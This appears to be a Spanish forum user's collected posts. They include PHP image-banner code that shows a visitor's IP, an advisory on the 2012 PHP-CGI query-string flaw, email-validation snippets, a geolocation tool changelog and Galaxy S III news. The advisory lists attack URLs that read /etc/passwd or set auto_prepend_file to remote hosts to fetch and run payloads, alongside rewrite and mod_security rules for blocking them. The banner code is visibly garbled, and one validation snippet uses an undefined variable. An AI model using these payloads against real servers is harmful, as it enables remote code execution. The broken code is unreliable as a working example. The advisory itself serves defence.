eregi "osf"$_SERVER 'HTTP_USER_AGENT' ] ) ) {
      
$rtnStr "OSF";
    } else{
$rtnStr "TuMáquinA";
    
$rtnStr "CyberSurfeando con $rtnStr";
    }
  }
  return 
$rtnStr;
}

$tmpInt 1;
$linea $tmpInt ] = gethostbyaddr RealIPget () );
$tmpInt++;
$linea $tmpInt ] = DetectOs ();

$ancho 0$alto 0;
for ( 
$a=1$a<=$tmpInt$a++ ) {
  
$tmpBoximagettfbbox 13,0"./files/trebucit.ttf"$linea $a ] );
  if ( 
$tmpBox ] - $tmpBox ] > $ancho )
    
$ancho $tmpBox ] - $tmpBox ];
  if ( 
$tmpBox ] - $tmpBox ] > $alto )
    
$alto =  $tmpBox ] - $tmpBox];
}

$altoTotal =  $alto $tmpInt;

$im imagecreatefrompng "./img/fondo_banner.png" );
list ( 
$fondo_w$fondo_h ) = getimagesize "./img/fondo_banner.png" );

$im_tmp imagecreatefrompng"img/M3I4L.png" );
list ( 
$tux_w$tux_h ) = getimagesize "./img/M3I4L.png" );
imagecopy $im$im_tmp$fondo_w $tux_w 25$fondo_h $tux_h 3000$tux_w$tux_h );

$im_tmp imagecreatefrompng "./img/mosx_banner.png" );
list ( 
$mac_w$mac_h ) = getimagesize "./img/mosx_banner.png" );
imagecopy $im$im_tmp$fondo_w/$mac_w 16 $fondo_h $mac_h00$mac_w$mac_h );

$im_tmp imagecreatefrompng"img/mosx_tux.png" );
list ( 
$tux_w$tux_h ) = getimagesize "./img/mosx_tux.png" );
imagecopy $im$im_tmp$fondo_w $tux_w$fondo_h $tux_h00$tux_w$tux_h );

$im_tmp imagecreatefrompng"./img/GNU-Linux.png" );
list ( 
$tux_w$tux_h ) = getimagesize "./img/GNU-Linux.png" );
imagecopy $im$im_tmp0$fondo_h $tux_h00$tux_w$tux_h );

$semitrans imagecolorallocatealpha($im,  0x990x990x990x25);
imagefilledrectangle $im22$ancho 4$alto $tmpInt 6$semitrans );

$b=0;

for ( 
$a=1$a<=$tmpInt$a++ ) {
  
$b=!$b;
  if (
$b) {
    
$fontColor imagecolorallocate$im0255255 );
    
imagettftext $im1304$alto*$a$fontColor"./files/trebucit.ttf"$linea $a ] );
  } else {
    
$fontColor imagecolorallocate$im255255204 );
    
imagettftext $im1204$alto*$a$fontColor"./files/trebucit.ttf"$linea $a ] );
  }
}

$fontColor imagecolorallocate$im0156255 );
imagettftext $im131263$alto*$a 24$fontColor"./files/trebucit.ttf"RealIPget () );

//Mostramos el grafico en pantalla
imagepng $im );

//Liberamos memoria
imagedestroy $im );
?>
#177
PHP / Grave vulnerabilidad PHP en modo CGI
15 Mayo 2012, 18:03 PM
Una vulnerabilidad vigente desde hace 8 años y la desucbren por casualidad  >:D

Apache mod_cgi

¿Cómo comprobar si su sitio es vulnerable?

Añadiendo -s? Al final de la URL  de cualquierscript PHP, como:

ww.tusitioweb.com/index.php?-s


?-s

http://example.com/index.php?-dauto_prepend_file%3d/etc/passwd+-n

Si ve el código PHP, el PHP es vulnerable.
Si ves a tu página normalmente, su sitio no se ve afectada.

    Allow_url_include: Permite el uso de fopen con algunas funciones como include, include_once,require, require_once.

    Auto_prepend_file: Permite especificar un archivo que será interpretado antes del fichero principal.


Ejemplos ataque (la mayoría intentando usar una webshell o ejecutando un backdoor)

/index.php?-s'
/index.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://www.5999mu.com/a.txt'
/index.php?-s/wp-admin/install.php'
/wordpress/index.php?-s'
/wp/index.php?-s'
/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3d%2Fproc%2Fself%2Fenviron'
/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2Fphp-cgi.ipq.co%2Fi'
/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dphp:%2f%2finput'
/index.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://www.qz0451.com/1.txt'

¿Cómo mitigar el problema?
Si su sitio se ve afectada, y puede que tenga disponible y habilitado mod_rewrite en Apache, por favor, añadir a la htaccess la regla de reescritura.:

El siguiente código no funciona:

RewriteEngine on

RewriteCond %{QUERY_STRING} ^[^=]*$
RewriteCond %{QUERY_STRING} %2d|\- [NC]
RewriteRule .? - [F,L]


Si funciona:

    RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]
    RewriteRule ^(.*) $1? [L]


Regla con mod_security

SecRule QUERY_STRING "^-[sdcr]" "phase:1,t:none,t:urlDecodeUni,t:removeWhitespace,block,log,msg:'Potential PHP-CGI Exploit Attempt'"

Solución:

Actualizar a PHP 5.4.3 and PHP 5.3.13
http://www.php.net/archive/2012.php#id2012-05-08-1

Fuentes:
http://ompldr.org/vZGxxaQ
http://www.php.net/archive/2012.php#id2012-05-03-1
http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/

En Español:
http://www.elladodelmal.com/2012/05/ejecutar-codigo-remoto-en-apache-con.html
http://www.pentester.es/2012/05/explotando-php-cgi.html

#178
PHP / Validación e-mail formulario
8 Mayo 2012, 19:38 PM
Validar e-mail:

Código (php) [Seleccionar]
function verify_email($email){

   if(!preg_match('/^[_A-z0-9-]+((\.|\+)[_A-z0-9-]+)*@[A-z0-9-]+(\.[A-z0-9-]+)*(\.[A-z]{2,4})$/',$email)){
       return false;
   } else {
       return $email;
   }
}


Código (php) [Seleccionar]

   function EmailValidation($email)
   {
   $email = htmlspecialchars(stripslashes(strip_tags($email))); //parse unnecessary characters to prevent exploits
   if ( eregi ( '[a-z||0-9]@[a-z||0-9].[a-z]', $email ) )
   { //checks to make sure the email address is in a valid format
   $domain = explode( "@", $email ); //get the domain name
   if ( @fsockopen ($domain[1],80,$errno,$errstr,3))
   {
   //if the connection can be established, the email address is probably valid
   return true;
   } else
   {
   return false; //if a connection cannot be established return false
   }
   return false; //if email address is an invalid format return false
   }
   }




Código (php) [Seleccionar]
function validar_email($email) {

list($local, $domain) = explode("@", $email);

$pattern_local = '^([0-9a-z]*([-|_]?[0-9a-z]+)*)(([-|_]?)\.([-|_]?)[0-9a-z]*([-|_]?[0-9a-z]+)+)*([-|_]?)$';
$pattern_domain = '^([0-9a-z]+([-]?[0-9a-z]+)*)(([-]?)\.([-]?)[0-9a-z]*([-]?[0-9a-z]+)+)*\.[a-z]{2,4}$';

$match_local = eregi($pattern_local, $local);
$match_domain = eregi($pattern_domain, $domain);

if ($match_local && $match_domain) {
return 1;
} else {
return 0;
}
}


En PHP 5:

Se añade la funcionalidad de filter_var

Código (php) [Seleccionar]
if(filter_var("prueba@dominio.com", FILTER_VALIDATE_EMAIL)){
echo "Ok";
} else {
echo "Error";
}


Usando filter _var y comprobando que tenga un punto el dominio con una expresión regular:

Código (php) [Seleccionar]
function validateEmailAddress($email) {
    return filter_var($email, FILTER_VALIDATE_EMAIL) && preg_match('/@.+\./', $email);
}


Ejemplo Wordpress (usando expresiones regulares)

Código (php) [Seleccionar]

   function is_email($email) {
    if( strlen( $email ) < 3 ){
     return false;
    }
    if( strpos( $email, '@', 1 ) === false ){
     return false;
    }
    list( $local, $domain ) = explode( '@', $Valor, 2 );
    if( !preg_match( '/^[a-zA-Z0-9!#$%&\'*+\/=?^_`{|}~\.-]+$/', $local ) ){
     return false;
    }
    if( preg_match( '/\.{2,}/', $domain ) ){
     return false;
    }
     if( trim( $domain, " \t\n\r\0\x0B." ) !== $domain ){
     return false;
    }
     $subs = explode( '.', $domain );
     if( 2 > count( $subs ) ){
     return false;
    }
    foreach ( $subs as $sub ) {
     if( trim( $sub, " \t\n\r\0\x0B-" ) !== $sub ){
      return false;
     }
     if( !preg_match('/^[a-z0-9-]+$/i', $sub ) ){
      return false;
     }
    }
    return true;
   }



Verificar e-mail mirando registro MX si es válido,  útil para separar nombre y dominio de un e-mail


Código (php) [Seleccionar]
function verify_email_dns($email){

   // This will split the email into its front
   // and back (the domain) portions
   list($name, $domain) = explode('@',$email);

   if(!checkdnsrr($domain,'MX')){

       // No MX record found
       return false;

   } else {

       // MX record found, return email
       return $email;

   }
}



Código (php) [Seleccionar]
$string = 'some_name@somedomain.com';
$res = explode('@', $string);
// array
echo $res[0];
$name = $res[0];
echo $name;



substr

Código (php) [Seleccionar]
$mail = "some_name@somedomain.com";
echo substr($mail, 0, strpos($mail, '@') );


explode

Código (php) [Seleccionar]
list($name, $domain) = explode('@', $mail);
echo $name;

#179
http://www.elhacker.net/geolocalizacion.html

Los cambios son:

- Mostrar últimas 5 consultas diferentes (sin repetidos)
- Resolver el reverso de ip (inversa dns, reverso dns, no sé como llamarlo)
- Si es un dominio muestra su ip
- Si es una ip muestra su reverso
- Al seleccionar la ip o el dominio de la caja de texto se selecciona todo para facilitar la escritura
- Si escribes una url (formato http:// también la localiza (limpia la url)
- Si es un email mira la localización del dominio (no de la persona :P) y si no hay registro MX del dominio te informa del error
- Arreglado el Whois IP RFC-954
- Si es una ip privada (rango, clase privado) te avisa

Recordad que el geolocalizador también localiza dominios y muestra todos los subdominios o dominios alojados en una ip (útil para hostings compartidos), además de mostrar el ASN (Proveedor asocionado de una ip, sea ISP o el hosting).

Me  he dado cuenta también (al guardar los logs de lo que consulta la gente) que muchos escriben usuario@gmail.com, imagino que para intentar localizar una persona por su e-mail, pero lógicamente eso no funciona xD

Si alguien se le ocurre alguna idea o sugerencia para añadir, bienvenida sea. Lo típico que has visto en otra web y que te parece práctico que lo tuviera pues lo añadimos, que para eso está.
#180
Android / Samsung Galaxy S III
7 Mayo 2012, 19:32 PM


4,8" Super AMOLED HD, Exynos 4 Quad y reconocimiento de gestos

Su salida en Europa está programada para el 29 de mayo, no hay información sobre operadoras relacionadas, y sabemos que habrá versiones con 16, 32 y 64 GB de almacenamiento, ampliables vía microSD, y con 50GB en la nube gracias a Dropbox.

El Samsung Galaxy S III de 16 GB saldrá por 599 euros en Alemania. . El rival surcoreano del HTC One X ya se puede encargar libre en Alemania por 16 GB de memoria interna, si bien en las ofertas listadas de Chip.de algunas tiendas también lo tienen por 588 y 616 euros (cuestión de escoger). Este importe coincide con la filtración de la filial germana de Amazon, que lo coló en reserva por 599 euros, pero también con una cámara de fotos de 12 megapíxeles y una pantalla de 4,7 pulgadas que finalmente no han aparecido en el modelo definitivo. La operadora T-Mobile tiene confirmada su distribución en Alemania.

Por otro lado, pero sin salirnos de los precios, la británica Carphone Warehouse ya tiene abiertas también las reservas del modelo libre de 16 GB a un precio de 499 libras (613 euros al cambio). Vodafone, Orange, O2, T-Mobile y Three ofrecerán el Galaxy S III como parte de su oferta, habiéndose hecho la primera de ellas con la exclusiva de la versión de 32 GB.



Con un peso de 133 gramos y un grosor de 8,6 mm en su extremo menos esbelto, el nuevo Galaxy S III destaca por ser el primer producto en utilizar el nuevo procesador Samsung Exynos 4 Quad, con que el que el fabricante surcoreano pretende aunar unas prestaciones muy elevadas con un consumo más optimizado. Integra una nueva GPU supuestamente un 65% superior a la unidad Mali 400 del Galaxy S II, así como 1 GB de RAM (aquí es donde posiblemente escucharemos las primeras quejas) y 16, 32 ó 64 GB de almacenamiento (con expansión microSD disponible). La pantalla escogida por Samsung es de tipo Super AMOLED HD (PenTile), posee una resolución de 1280x720 píxeles y ha sido protegida por los chicos de Corning usando una lámina de Gorilla Glass 2.







[youtube=425,350]http://www.youtube.com/watch?v=D683O1YeozY[/youtube]

Hardware: especificaciones y diseño

   Carcasa de policarbonato con acabado brillante. El móvil, al contrario que su antecesor, tiene unas formas redondeadas y la parte posterior es curva. Aun así, según nuestros colegas de Celularis (que se trasladaron a Londres para la presentación) y pese al plástico, es bastante sólido.

   Colores: De momento, confirmado azul marino, negro y blanco.

   Con un peso de 133 gramos, el grosor aumenta hasta alcanzar los 8,6 milímetros. 136mm de largo por 70.6mm de ancho.

   Cuenta con tres botones y un LED para las notificaciones, al igual que los smartphones de Blackberry. La batería es extraible y llega a los 2.100 mAh.

   La pantalla, HD SuperAMOLED, aumenta hasta las 4,8 pulgadas frente a las 4,3 de su antecesor. La resolución se queda en los 1280x720 píxeles. Para llegar a este tamaño se ha reducido los márgenes del móvil aprovechando al máximo el espacio disponible.

   Procesador Exynos de cuatro núcleos (a 1,4GHZ por núcleo) y 1Gb RAM de memoria.

   Hay diferentes modelos, pero la capacidad interna es de 16, 32 y 64Gb. Además, incluye una ranura microSD para aumentarla hasta 64GB más.

   Cámara de 8 megapíxeles y video en fullHD (1080p). La cámara delantera llega a los 2 megapíxel y graba video en 720p.

   Incluye bluetooth 4.0 y NFC.

   Entre los accesorios encontramos un cargador inalámbrico, para recargar el móvil sin cables, mediante electricidad inductiva y una funda similar a la Smart Cover para el iPad: Flip Cover.

Software: Android a medida

Parece que Samsung se va alejando cada vez más de la imagen de Google y Android. Con una nueva versión del SO Android Ice Cream Sandwich, el nuevo Galaxy SIII llevará instalado de serie una versión conocida como TouchWiz Nature UX. A continuación algunas de sus mayores características:

   Music Hub: más de 17 millones de canciones en la nube, 2 millones más que el propio Spotify. Samsung quiere ser la competencia directa de los servicios de música más populares que hay en la red y para ello ha lanzado Scan and Match, capaz de escanear todas nuestras canciones y subirlas a sus servidores por 10$ al mes. Sospechosamente similar a iTunes Mach.

   PopupPlay: aprovechando la gran resolución en la pantalla del Galaxy S3, los desarrolladores han implementado la posibilidad de dejar en un segundo plano el video que estemos viendo y realizar otras actividades como enviar emails o escribir algún tweet. Muy interesante y útil por si queremos enviar algún mensaje urgente y no perder de vista nuestros vídeos o películas favoritas.

   Modo Ráfaga: como hemos mencionado en el apartado de hardware, el nuevo Samsung Galaxy S3 incluye una cámara de 8 megapíxeles que además dispara en ráfagas de 3,3 imágenes por segundo. El software nos creará una pequeña visualización de las imágenes realizadas para elegir la que mejor nos haya salido.

   All Share: más similitudes con iOS. En este caso, han copiado la funcionalidad AirPlay descaradamente. Sin necesidades de cables podemos realizar un streaming a televisiones Samsung que estén conectadas a la misma red WiFi.

   Direct Call: utilizando el sensor frontal del terminal, si estamos viendo el contacto de una persona o hablando con ella por WhatsApp, al llevarnos el teléfono al oído realizará una llamada automáticamente a esa persona.

   Buddy Photo Share: parecido al reconocimiento facial en iPhoto, esta funcionalidad reconoce las caras de las personas que aparecen en la foto y si las tenemos guardadas en la agenda podremos enviarles la foto por email con tan solo pulsar un botón.

   S Bean: gracias al NFC, podremos enviar archivos de música, vídeos y fotos entre teléfonos sin necesidad de cables o conexión a internet.

   S Voice: si antes hablábamos de similitudes y casualidades, esto es una burda copia de Siri para iPhone. Casi con el mismo diseño que su homólogo en iOS, S Voice es capaz de funcionar sin necesidad de tocar el terminal, cosa que en iPhone no es posible. Además, hay sorpresa: reconoce el castellano.